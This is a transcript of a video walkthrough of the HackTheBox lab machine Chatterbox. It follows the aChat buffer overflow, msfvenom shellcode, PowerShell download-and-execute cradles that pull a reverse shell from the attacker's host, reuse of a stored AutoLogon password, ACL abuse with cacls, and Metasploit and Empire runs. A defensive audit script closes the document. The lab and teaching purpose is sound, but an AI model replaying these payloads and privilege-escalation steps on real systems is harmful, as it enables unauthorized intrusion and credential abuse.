HackTheBox - Chatterbox
01:18 - Begin of Recon
04:55 - Start of aChat buffer Overflow: Finding the exploit script with Searchsploit
07:24 - Begin of replacing POC's Calc Shellcode with what is generated from MSFVenom
09:42 - Correction: Payload Size wrong, should be 3,xxx -- look at "Payload Size" I accidentally highlighted the size of the python file.
14:30 - Whoops, erased too much out of POC. Let's correctly replace the shellcode this time and get a shell.
17:50 - Running PowerUp to find AutoLogon Credentials
20:05 - Running Code as Administrator
24:18 - First Privesc Method: Using Start-Process to execute commands as a different user because Invoke-Command did not work.
27:30 - Alternate way to read root.txt -- Alfred owns root.txt, so he can edit the file's access list. Get-ACL to view the access list and cacls to modify it.
33:12 - Summary of the box
### BOX DONE
34:37 - Doing the box with Metasploit. Warning: Lots of fails.
43:10 - Using meterpreter's portfwd to bypass Chatterbox's firewall and access port 445
51:25 - Doing the box with Empire !
58:20 - Using Empire's Run_As module to execute commands as Administrator
What You'll Learn
The video demonstrates an attack on a HackTheBox machine called Chatterbox, using tools such as Metasploit, msfvenom, and Empire to exploit a vulnerability and gain access to the system. The attack involves a buffer overflow exploit, followed by post-exploitation techniques to gather information and escalate privileges.
Full Transcript
What's going on YouTube, this is IppSec. We're doing Chatterbox from Hack The Box, which is a relatively easy machine, so you're probably wondering why this video is so long. Well, we're gonna get user three different ways. The first way is getting it with nishang, which isn't using Metasploit, then we're gonna use Metasploit, then we're gonna do PowerShell Empire. And then once we get user all three times, we're gonna be doing two different privesc methods. The first method is going to be the intended method, which is an auto-login password that was hard-coded, and the second method is through root.txt being owned by Alfred, which is the low-privilege user, so we can issue a command to give ourselves read access to the file since we own it. So yeah, that should be fun, but let's get into the box a little bit. It's got a lot of downvotes because it doesn't listen on any of the top 1000 ports, so a lot of people thought the box was down. You have to do a full port scan to find the ports that aChat listens on, which is the application that is exploitable, and even if you find it, it may still be down because that exploit is a buffer overflow, and a lot of unexpected things can happen if you just keep mucking around with it. Hopefully it's a relatively stable one if you know what you're doing, because we're gonna be using that buffer overflow quite a bit, and if I have to revert this box a lot I'm going to be relatively upset. So let's find out how stable this is and jump in and begin. We're gonna start off with nmap, so nmap -sC for default scripts, -sV to enumerate versions, -oA to output all formats, put it in the nmap directory and call it "initial", then the IP address of Chatterbox, which is 10.10.10.74. This does take some time, so I've already ran it. Looking at the results, we see absolutely no ports are listening, but the host is online, so we know we got the correct IP because nmap says the host is up, because it did do a ping on 10.10.10.74. When that happens I will do a nmap -p-
-p-, that is all TCP ports, 1 through 65535, and then do -oA to output all formats in the nmap directory, call it allports, then nmap the IP address, 10.10.10.74. This command does take some time, so I've already ran it. Looking at the results we do see two ports are open: 9255 and 9256. I will generally always do a nmap -p- after I did my first scripts scan; you can do -p- first, but I'm lazy and generally like doing things with one command. And if you wanted to you could do -sC -sV with a -p-, it will just take frickin' forever. So let us do a nmap -p 9255,9256, the two ports that are listening, then do -sC -sV -oA nmap/allports, I mean nmap/targeted, on 10.10.10.74. Shouldn't take too long to run. I could have added like -n and not do a DNS reverse lookup, -T5 to make it aggressive, -Pn to make sure it doesn't do a ping, and now it's sped up a little bit more. And that's weird, we didn't get anything back from any ports, both tcpwrapped, which doesn't make sense to me. Something is fishy; let's run that again and we'll speed it up this time. We should have got something other than tcpwrapped, because it means the port's online but it just closed. There we go, we have one as HTTP, one as aChat, and we have httpd open. We could also do --script vuln to do a vuln scan; I've never actually done this one on this box, I don't know if nmap has anything to detect that. So while that runs, let us go over to the IP address 10.10.10.74, and I forgot that has to be 9255, and my Burp is configured to not intercept, so I'm not sure why... there I go, 10.10.10.74:9255. We just get a complete blank page. If we wanted to we could intercept, send to Repeater, Firefox is being funny, there we go, and we see the server is aChat and then it just closes, a 204 No Content. We could add things like robots.txt and see if it has files, or do a gobuster on it, but I don't think we have to do that here. The scripts for vulnerabilities
didn't find anything, but let us just do a searchsploit for aChat, since that is the server. This generally is like nginx, IIS, Apache, but this being aChat is unique, so I searched in searchsploit, which is essentially Exploit-DB just local to Kali, and when we type aChat we see two things come back: we got a Metasploit module and a Python module. So let's do this with Python first. We can do searchsploit -m for mirror (if you do -h you can see everything); when we do -m and then exploits/windows/remote/36025, it copied that to my directory. So let's look at this exploit and see what it does. It gives us an msfvenom command to generate some shellcode; this one is going to spawn calculator. Then buffer, so this is what msfvenom outputted. We see the server address it's connecting to, so let's change this to 10.10.10.74; the port is 9256. Here it's building the payload; this is probably doing something to set up the message because it is an instant message, and here's where we're putting the thing from msfvenom, the buffer, and it's going to look like it put buf plus "A" times 1152 minus the length of the buffer. So let's see, 1152 is probably the maximum payload size that we can have, so if this goes beyond 1152 bytes then the buffer's too big and the payload crashes, so we have to keep our shellcode below 1100 bytes. And that is about it, so let's do :wq to write, because we did change the IP address, and I'm gonna grab the msfvenom command out of 36025.py and let us see what command we can run. So this is doing windows/exec, so let's look at other payloads we can do: msfvenom --list payloads, and let's grep for powershell. There may be like a msfvenom thing that does a reverse PowerShell back to us. And while that runs, let's copy all this output into a clipboard. We do have windows/powershell_reverse_tcp, and this is all underscores, so this means it is not a staged payload. If this was like powershell/reverse_tcp then we'd have to do exploit/multi/handler
because it makes it connect back to us, then sends it the payload, which it executes and sends it to us. So let's just do the powershell_reverse_tcp. I'm gonna paste what's in my clipboard and then we'll change -p to be windows/powershell_reverse_tcp, and CMD isn't an argument, LHOST and LPORT are, so LHOST=10.10.14.30, I'd say 30, yep, 30 is my IP, and then we do LPORT=9001. Generate the payload, and okay, that finished quicker than I could explain something. I just wanted to say, when you see like BufferRegister=EAX, this means that's where the actual jump call should be, so once the buffer overflow happens EAX is pointing to the buffer here, and you put that in your shellcode. I believe if we looked at that 36025 and really debugged it, it would be doing something, and when the buffer overflow happens EAX points to the memory address of your buffer. You also have the encoding, and -b: these are bad characters, so we don't want to send any of these characters through. Unfortunately we have 15,000 bytes, which is bigger than 1100, so we can't use this payload. So what I'm going to do is let us go back to the original one. It's off my clipboard now, so, that's not it, grab the msfvenom from 36025, and instead of doing CMD=calc.exe I'm gonna do a PowerShell command. So we'll do CMD=... this is gonna be tough, because we have to do double quotes twice, which I hate doing because you have to escape one and it always does weirdness. So we do powershell, then IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.30/pleasesubscribe.tip') (the extension doesn't matter when it comes to this), and backslash double quote to escape that, and then that. And I know, just because we want to go to a new line, it doesn't matter. So copy this command. Generally I would do like a ping command or something first to make sure the exploit works; we're kind of jumping a little bit going straight to PowerShell, but we'll know if the exploit works
if it hits a web server. So while that runs let us open a new window and let's go to www, and let's copy nishang. So /opt, I think I've been in PowerShell, nishang; if you don't have this just google "github nishang" and then download it. But let's see, we want Shells and Invoke-PowerShellTcp.ps1, and it gives us instructions, so we just want to do this command. Whoops, I always do dd to put a line in my clipboard, or whatever it is in vi, and I can just do p to put it there; there's more optimal ways to do it but that's just how I do it. IP address is 10.10.14.30 and port, we'll do 9000... did I do 9001 already? I don't know if I did, let's go back here, I don't think I did 9001. 9002, that's going to be where the shell comes. So we can copy this, vi on 36025, and we want to replace this buffer. I'm gonna delete 50 lines with 50dd and then just get rid of this stuff and then paste. I suppose we should change what the msfvenom looks like for documentation purposes. Okay, so let's move Invoke-PowerShellTcp to pleasesubscribe.tip, then we do python SimpleHTTPServer on port 80, and let's just send that to pane one, and then we can execute this and hope for the best. "p is not defined", we screwed something up. Go to line 70, while i < len(p), I have no clue what I screwed up there, so let us -m to mirror this again, go right, and maybe I deleted an extra line. Oh, I deleted all this, the "create UDP sockets" stuff, that's my bad, so 50 was too much. So we'll do 20 to delete 20 lines and then delete the rest. So always be careful when deleting stuff, how you may delete too much. And we have to change that IP again, 74. Run the exploit, we have it hitting pleasesubscribe, it gave us a HTTP 200, and we didn't start netcat, that is our bad, so let's split the pane again, nc -lvnp 9002, and we'll try this again. Hey, pleasesubscribe, we get a connection, and we have a PowerShell session. So now we could go cd \, cd, let's see, whoami, chatterbox\alfred. So we go Users,
Alfred, Desktop, and we could do (Get-Content user.txt).Substring(0,16). You just need Get-Content; I do this so you can't see the whole flag. And I made an error, dir user.txt, so (Get-Content user.txt).Substring(0,16). Why, PowerShell? Well, nope, there we go. Not sure what I did the first time, but had a weird error message. So there's the user flag. The very first thing generally I do on a box is either run Sherlock or PowerUp. I'm going to do PowerUp, so let's go back to the www directory and then cp /opt, do I have it here, PowerSploit, then Privesc, PowerUp, copy that there. And before I do that I'm just gonna do whoami /all and we can see what tokens we have, because in a lot of previous videos when we did Windows boxes we wanted that SeImpersonate token, and we don't really have any dangerous tokens on this one. So let us just do PowerUp: IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.30/PowerUp.ps1'). Should be good, it got it, and notice we didn't get any output right away, and that's because, unlike when I did the nishang, I didn't put an Invoke-AllChecks here at the very bottom, so all we did was load all the PowerShell functions into memory. And the reason why I did it with the reverse shell is because I didn't want my payload to have to call a command after it downloads this file; I'd rather know it downloads the file and executes the file, I don't want that second command in between. For when I have a shell, it doesn't bother me, so I'm just gonna do Invoke-AllChecks and we'll see what that outputs. If you wanted to, you could just like grep -i function, I think, in PowerUp and see the various functions it has. So let's see, let's go to the very top, give it a capital, there we go. Where's my Invoke-AllChecks? That's where my /all... okay, well, oh here it is, here's where PowerUp begins. So we have a default password of Welcome1! as a registry autologon, and that is it. So let us try that password on other things, and because
we don't have any ports listening on the box and we didn't use meterpreter, so it's a pain in the butt to port forward, I'm just going to manually try different users. Type net user and we can see there are 3 users on the box: Administrator, Alfred and Guest. So let us try running a command as Administrator. To do that we have to create a credential variable; Windows is a bit funny and doesn't like you passing passwords in plain text to a command, so let's create a variable for a password, ConvertTo-SecureString, the password was Welcome1!, and I got that from the Invoke-AllChecks up here, and then we'll do -AsPlainText, and it'll complain, "no". Yes, we know this is bad, putting passwords in plain text, but do it anyway, and -Force it to do so. Then we can do a new variable called $cred, a New-Object System.Management.Automation.PSCredential, I think, and the username will be Administrator and the password will be the $SecPass variable. We do $cred, we do see that variable, it has a username Administrator and the password is some secure string. So we should be able to do Invoke-Command, I think, -Credential $cred -ScriptBlock { whoami }. See later... I did something wrong, does this need to be in quotes? Let's see, it does not like Invoke-Command; maybe Invoke-Command requires PowerShell remoting. So let's try Start-Process, maybe that'll work: Start-Process -FilePath powershell -ArgumentList whoami. It won't give us any output, so let's just, I guess, hope for the best. See, go back here, we can search for IEX, that was weird, and we'll copy what we did before and paste it in. I think I copied a newline character, that's annoying. Just finish typing: -ArgumentList, double quote there, http://10.10.14.30/shellsforall.ps1, and then we can do that. Let's go over here, we'll move PowerUp.ps1 to be shellsforall.ps1, or not PowerUp, we'll copy pleasesubscribe to be shellsforall.ps1 and edit this and change this port to 9003. Listener, 9003 on this command, and my shell actually completely
died, so 9002, let's get a shell again, this or 9003, and copy this and hope for the best. If this works then we can add in the credential and see if we can do it as a different user. "A positional parameter cannot be found that accepts argument", oh, so it looks like Start-Process doesn't work like I thought it did, because -ArgumentList is not accepting IEX. Let's see, let's just try one last thing: I want to copy this, and then we're not going to do these backslashes, because I just realized that was completely unnecessary because I'm not needing to escape anything. Let's try this. No error message, we got the call and we have a shell. Do clear, whoami, we're Alfred. So let's do this again but this time do the credential. So we will copy this to a clipboard and then do $SecPass, okay, and now we got to create the credential. Looks good, mistyped something, let's redo this, System.Management.PSCredential, so I typed last time... Administrator, $SecPass. So "you cannot find System.Management.PSCredential", oh, I'm forgetting Automation, PowerShell is annoying, System.Management.Automation.PSCredential, there we go, sorry about that. Okay, we can paste the command and this time we can hope that Start-Process has a -Credential flag. We start the process with the $cred, we got a connection, and we're Administrator. So now we can go into Users\Administrator\Desktop and then Get-Content on root.txt, and then we of course want to do a Substring of 0 to 16, and there's the first 16 characters of that. The funny thing is, if we do a whoami as Alfred, and we go to, let's see, cd Users\Administrator\Desktop, we can actually get in this directory as Alfred. We aren't admin right now, and if we tried to get this file, Get-Content on root.txt (I'm still doing Substring just in case someone left the box in a bad state), we can try to cat this file with type, and we have permission denied. So for some reason we're allowed to access the Administrator's home directory as Alfred. So what we can do is a Get-Acl and then the directory, like
Administrator, I think we pipe that to fl, which is, I want to say, full list, I forget what fl is, but this has all the permissions on it. So let's see, where are we, here we go, AccessToString: NT AUTHORITY\SYSTEM has full control, Administrators have full control, Administrator has full control, this is the groups, and then Alfred has full control. If we look at the owner, the owner is SYSTEM. So if we go into Administrator we can look at the Desktop and do the same thing on root.txt, so Get-Acl root.txt | fl. Still, see what that is, pretty sure it's full text, so full length or something, let's see, that's bothering me now. Our show, what is that? It shows a lot of weird abbreviations that once you use them you can't just forget about them: Format-List, yeah, the F means Format and then -List, that's right. So Format-List, and we want to display everything in the list. But back to this: we Get-Acl on root.txt, we can see the AccessToString is only CHATTERBOX\Administrator, and Alfred is not here like he was on the folders, but if we look at the owner, Alfred actually owns this file. So there is a way to do this in PowerShell; it is a pain, you have to type a lot to do it for something that's relatively simple. I want to do cacls, which is the command, like the old way to do it in Command Prompt. So if we just google "man cacls" we can see how to use it. So we're going to use the /T to search for the path name, then /E for edit ACL, and then we probably want to do /P to add a user and permission, and we want to do full control. So again, if we try to view, actually we'll view it this way, root.txt Substring 0 16, we can't. Let us, why did I copy that, that just erased my standard out, that sucks. I was gonna copy that and we could show that I'm writing the same exact command, but you'll just have to trust me, I guess, or type it yourself. So let's do cacls /T, let's specify the file root.txt, /E edit, /P for permission, Alfred, and we'll give him F, and I think we just screwed something up.
Let's do cacls root.txt /T /E /P Alfred:F, there we go, that worked. Before, maybe it doesn't like the /T first, yeah, I think it just doesn't like the /T first. Okay, but now if we do Get-Acl on root.txt and fl *, we can see AccessToString, Alfred has full control. So we can do (Get-Content root.txt).Substring(0,16) and view the file that way. So there's two different ways we could have done this box. And let us just remove those permissions so no one else can do it, so I think it was, let's see, we need /T and then /R for Alfred, and we want root.txt. Okay, processed the file, and let's do a Get-Content again: we can no longer get that file because we removed Alfred from the ACL. So to sum up this box: we started off with nmap, we saw that the server was aChat, we used searchsploit to look for vulnerabilities for a program named aChat, we saw one, we pulled the exploit code, then we used msfvenom to generate exploit shellcode for the exploit so we could replace it in the Python script, then we executed the Python script, we got a shell as Alfred. We saw there was a hard-coded password that was stored for Alfred so he could autologon into the box, so PowerUp will always display when you have a user that autologons; the password has to be stored in Windows, so PowerUp pulled that password, and it was the same password as Administrator, and that gave us access. Additionally, we had a second way in because Alfred owned the file root.txt, so we could edit the ACLs on it. And before we conclude this video we're going to do this box with Metasploit and then potentially do it with Empire. So let us restart everything and do this with, not Empire, Metasploit. So exit, exit, exit, there we go, and go here. I don't think my PostgreSQL database has started, so I'm going to start that, because having the database up speeds up Metasploit a lot when searching for things. Start PostgreSQL, then we can just do search achat and we
find the aChat exploit. So let's use this, show options, set RHOST to be 10.10.10.74 and set LHOST to be tun0, set LPORT to be 9001. We run the exploit, it should set up a listener and send this payload. Oh no, "No encoders encoded the buffer successfully", that's weird. show options, LHOST 10.10.14.30, that's correct, LPORT 9001, set LPORT to be 9001. Well, let's set the payload to something: set payload windows/meterpreter/reverse_http, run. I'm not sure why that's giving an error message, that is odd. Let's see, show advanced options, and let's see, search for encoder: EnableStageEncoding is all false. I have no idea why that isn't working; I could have sworn I'd done this before. "No encoders encoded", that is bizarre. 9256, process, okay, well, let us just skip exploiting it with Metasploit like this and just go straight to unicorn. I'm not exactly sure why that's erroring. So if we execute unicorn we can see its usage, so let's copy: python unicorn.py, then we can do 10.10.14.30 and we'll do port 9001. It's generating the shellcode, and while that does that let's set up... whoops, I don't know what key I hit, okay, well, it finished. So let us just move the files, so we'll move powershell_attack.txt into Documents/HTB/boxes, this is Chatterbox, and we'll move unicorn.rc there as well. So let us cat powershell_attack.txt, the PowerShell command to execute a meterpreter payload with unicorn, so let's just move that into www/pleasesubscribe. Then we do msfconsole -r unicorn.rc, let's split the pane, go into www and then do python -m SimpleHTTPServer, split it again, and we can do... I don't know why I start with tmux, nmap, that is weird, but python, and exit. Cool, execute the manual buffer overflow. So this is going to trigger the exploit in aChat, which is going to go to a Python web server that we have started on port 80, and then that's going to send it over to Metasploit. So send the exploit, we got pleasesubscribe, and we didn't get anything over here. What's going on with
Metasploit? Oh, there we go, just took a little bit. So session 1 is opened, over here sessions -i 1, we can interact with it. We can do ps and get a list of all the processes, but most importantly we can do post exploitation modules. So we can search windows, let's search post/windows/gather for like information gathering things. We can go to the top and then start going down this list. So not on intend, a bunch of post credential stuff, and windows_autologin, we'll just cheat and use this right off the bat. So if we use the autologin module, we'd use... we don't do usemodule, that's Empire. show options, we can set the session to 1, which is a meterpreter session; if we do sessions we can see that, and then run this, hopefully it will tell us. Oh, Metasploit is lying to us, there's definitely an autologon password. Should always test things. search passwords, probably a bad one to search for, let's see, we need smart_hashdump, maybe that'll do it, we can get lucky here. So use, what do, setg so session is always set to 1. "Insufficient privileges", well this sucks. post/windows/gather/credentials/windows_autologin, use, good, I could have sworn that was the correct one to use. Let's see, LAPS, we don't want. So you can tell how much I use Metasploit, because this should be something super simple but I don't know. So what I'm gonna do is do sessions -i 1, we'll do powershell, and then we will do powershell_shell, and we can just do this exactly like we did before. So IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.30/PowerUp.ps1'), I don't think I renamed it, hopefully I didn't. Invoke-AllChecks, and we'll get the same exact thing. This time we'll do something a little bit different to get the second code execution; maybe it may fail on us. Okay, so we can see Invoke-AllChecks, we found this password, so let's exit PowerShell, terminate the channel. Let's see, we want to do a port forward command, so portfwd, let's see, portfwd -h shows the options, we want to do a local port forward, I believe, so portfwd add -L...
it's optional, no, no, capital is optional, lowercase -l, local port to listen on, so we do 445, then we want to forward that, -p 445, and we want to say that goes to -r 127.0.0.1. Right, hopefully that's right. If we did a shell, let's make sure we're listening on port 445, so netstat -a, TCP is listening on 445. So on our Kali box now, if we do a netstat -anp | grep 445, we're listening, and Ruby is listening, so this is when we connect to this port it's going to send it through meterpreter, let's go to whatever -r was, so it's going to go to 127.0.0.1 after going through meterpreter and then going to the port 445. So we should be able to background this and search for psexec and do like, let's see, use exploit/windows/smb/psexec, show options, set RHOST to be 127.0.0.1, set SMBUser administrator, set SMBPass Welcome1!, we exploit. Required to set LHOST and stuff, so LHOST tun0, set LPORT 9002, run this, it should start a listener and then try to do a SMB exec through localhost on port 445. So it's authenticating, selecting PowerShell as the method of execution, and "attempted to execute the payload but did not", that's weird. winexe -h, so we want to do -U administrator%Welcome1! //127.0.0.1 cmd. Login failure, so maybe we typed the password in wrong, that is totally possible. Welcome1!, that should be it. No, I typed that in right. Let's do, what's the hostname of this guy, see, Chatterbox, still NT login failure, administrator, Welcome1. We can't do that as Alfred because he's not an administrator. Let's see, is there no runas in Metasploit? Let's see, search run_as, use, nope, maybe it's runas, I'm just guessing. There we go, post/windows/manage/run_as, let's try this one. use this, show options, set CMD, oh that's annoying, powershell IEX (New-Object Net.WebClient).DownloadString, and we'll do, what is it, 10.10.14.30/pleasesubscribe. Okay, well, hope that's good. set USER to administrator, set PASSWORD to Welcome1!, right, we forgot that
session, DOMAIN, we need that, Chatterbox. We didn't forget SESSION because we setg'd it globally, set it. Command ran, it hit it, I guess? Whoops, handler, show options, oh there we go, session 2 is open. Let's interact, getuid, and we're Administrator. So I just forgot it takes a little bit to get it running. And as I did that I remembered I could only use impacket psexec; impacket, is it wmiexec, and then we can do, let's see, target will be administrator, put this in single quotes, administrator:Welcome1!@localhost and execute cmd. Connection refused. Let's try psexec with 127.0.0.1, okay so that works. I guess I erased localhost out of my /etc/hosts file, so that would be as Administrator. And let's try that wmiexec again, because this should've worked, nope, so you could do it with psexec. Let me see my hosts file, yeah, I don't have localhost here, 127.0.0.1 localhost, so that's why I couldn't resolve localhost, it wasn't in my file. So that is how you do the box with Metasploit, and I guess we should do Empire. So let's shut down and exit again, and then we'll do it one last time. So I want to keep that www there, just drop that server, because we're going to use the same pleasesubscribe type file. So it's good, in /opt/Empire, actually let's remove Empire and let's just get a fresh version, so github Empire, git clone, cd Empire, and we have to go into setup, install. Oh, it's changing libraries on my computer, this is gonna take longer than I thought. Oh, my bad, I thought I used Empire more recently. Finally did all the installation, we're gonna hit enter to do a random negotiation password, and now we just execute Empire. Should load, and we can start off with doing listeners, there's no listeners, and now we can do uselistener, and after hitting space you have to, uselistener, you can do tab and see the different listeners you have. I'm gonna do http and then hit tab a few more times, we don't have anything. So now we can do show
options, or info; show options is Metasploit, and we can see the different arguments we have. So we have to set the Host to be http://10.10.14.30, and we don't want to use port 80, we want to use port 443, I guess, because 80 is our SimpleHTTPServer, so we don't want to overwrite that. We also have to change the BindIP, it's probably to 10.10.14.30. Do info again, but with options, looks like they changed, so we can do execute. Start at port failed because we didn't change, set Port to be 443, execute. It'd be really nice if when you change the host it changed everything at once, but that's not the case. So now after we do this we should be able to, maybe, usestager, let's see what options do we have here, not there, options here, one of them was like usestager, there we go, usestager, and that's not it. interact, listeners, load, plugins. We could, these are a bunch of different stagers, like if we want to do an HTA file or things like that, but one of them was just give us PowerShell. Let's see, listeners, creds, uselistener http, launcher, launcher when in the actual listener menu, and we can do launcher powershell to give us the PowerShell command. So if we copy this and then we can go to pleasesubscribe.tip, instead of launching the thing that came out of unicorn we paste the thing that came out of Empire. I don't know why I just exited that. Now we can just do python the exploit, which is going to make us hit that pleasesubscribe, which then executes Empire. So if we do agents, we now have an agent. We can do interact, and you could do all or just specify the agent you want to interact with, you do info again to see some stats, double tab to see commands you can do, but we want to do searchmodule, and I think PowerUp is a module actually, so there we go. So let's usemodule, oh crap, hello, let's go back, usemodule here, usemodule, oh, we do usemodule, I don't think you can do this, weird, I'm doing something silly, it's so hard to switch between both, nothing Metasploit and straight to Empire. Let's do agents, interact,
usemodule is a thing, and we don't specify powershell, we just do privesc/powerup/allchecks, because it's a PowerShell agent so you ignore that very first thing. Let me do info and see what we can do: the Agent to run it on is the correct one, so we just execute it and we tasked that agent to run it. "Valid results returned", info, we should have got the results, interact with it again, do we get it, no, don't exit, interact, okay, once we interact with it again we get the actual results and we can see the same exact thing we've always seen, it's Alfred and Welcome1. So let us searchmodule and we'll just search for run to see if we can find one that has like runas. There it is, runas, okay, powershell/management/runas, so let's usemodule management/runas, because powershell is assumed with the PowerShell agent. Do info, set UserName to be Administrator, Administrator, yep, set Domain to be Chatterbox, set Password to be Welcome1!, set Cmd to be powershell, and set Arguments to be IEX (New-Object Net.WebClient).DownloadString of our IP, pleasesubscribe.tip. Make sure we're still listening on http, we are. If we execute this we can see we got a hit back, we got a new agent. So if we do agents we have Alfred and Administrator, and this Administrator has this asterisk, good, because I believe that means it's UAC bypassed, so it's Administrator running in an administrative context. So that is, I guess, a quick primer on how to use Empire. I did this in the Blue video a few months ago, so I made less mistakes back then; you may want to check that video out if you like Empire. But yeah, take care guys and I'll see you next week.
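As an added example, not from the video and not part of PowerUp, Metasploit or Empire, here is the defender's-side audit for the two weaknesses the walkthrough chains together: an AutoLogon password stored under the Winlogon registry key (what Invoke-AllChecks reported) and files inside the Administrator profile owned by a low-privilege account (what let Alfred use cacls on root.txt). The profile path, the allowed-owner list and the remediation commands it prints are assumptions for a typical standalone Windows host; run it from an elevated PowerShell.

```powershell
# Added example (not part of the video). Audits a Windows host for:
#   1. an AutoLogon password stored under the Winlogon key, and
#   2. files under the Administrator profile whose owner is not an admin identity.
# Assumptions: run elevated; profile path and owner allow-list are typical defaults.

$WinlogonKey = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'

function Get-AutoLogonExposure {
    $wl = Get-ItemProperty -Path $WinlogonKey -ErrorAction SilentlyContinue
    [pscustomobject]@{
        AutoAdminLogon  = [string]$wl.AutoAdminLogon
        DefaultUserName = [string]$wl.DefaultUserName
        # Report only whether a cleartext password is present; never copy it into a report.
        PasswordStored  = -not [string]::IsNullOrEmpty($wl.DefaultPassword)
    }
}

function Get-ForeignOwnedFiles {
    param(
        [string]$ProfilePath = 'C:\Users\Administrator',
        [string[]]$AllowedOwners = @('BUILTIN\Administrators', 'NT AUTHORITY\SYSTEM',
                                     'NT SERVICE\TrustedInstaller')
    )
    Get-ChildItem -Path $ProfilePath -Recurse -File -Force -ErrorAction SilentlyContinue |
        ForEach-Object {
            $acl = Get-Acl -Path $_.FullName -ErrorAction SilentlyContinue
            if (-not $acl) { return }
            # The local Administrator account owning its own files is expected;
            # any other MACHINE\user owner is the misconfiguration (root.txt owned by Alfred).
            $isAdminOwner = ($AllowedOwners -contains $acl.Owner) -or
                            ($acl.Owner -like '*\Administrator')
            if (-not $isAdminOwner) {
                [pscustomobject]@{ File = $_.FullName; Owner = $acl.Owner }
            }
        }
}

$auto = Get-AutoLogonExposure
if ($auto.PasswordStored -or $auto.AutoAdminLogon -eq '1') {
    Write-Warning "Winlogon AutoLogon configured for '$($auto.DefaultUserName)'; DefaultPassword present: $($auto.PasswordStored)"
    Write-Host 'Remediate with:'
    Write-Host "  Remove-ItemProperty -Path '$WinlogonKey' -Name DefaultPassword -ErrorAction SilentlyContinue"
    Write-Host "  Set-ItemProperty    -Path '$WinlogonKey' -Name AutoAdminLogon -Value '0'"
} else {
    Write-Host 'No AutoLogon password stored in Winlogon.'
}

$foreign = @(Get-ForeignOwnedFiles)
if ($foreign.Count -gt 0) {
    Write-Warning "$($foreign.Count) file(s) in the Administrator profile are owned by a non-admin identity:"
    $foreign | Format-Table -AutoSize
    Write-Host 'Reassign ownership to the Administrators group and reset inherited ACLs, e.g.:'
    Write-Host '  takeown /F <file> /A'
    Write-Host '  icacls <file> /reset'
} else {
    Write-Host 'No foreign-owned files found under the Administrator profile.'
}
```

Because the owner of a file can always rewrite its DACL (which is exactly what cacls /E /P did in the video), an ACL review that only lists access entries and ignores the Owner field will miss this class of finding.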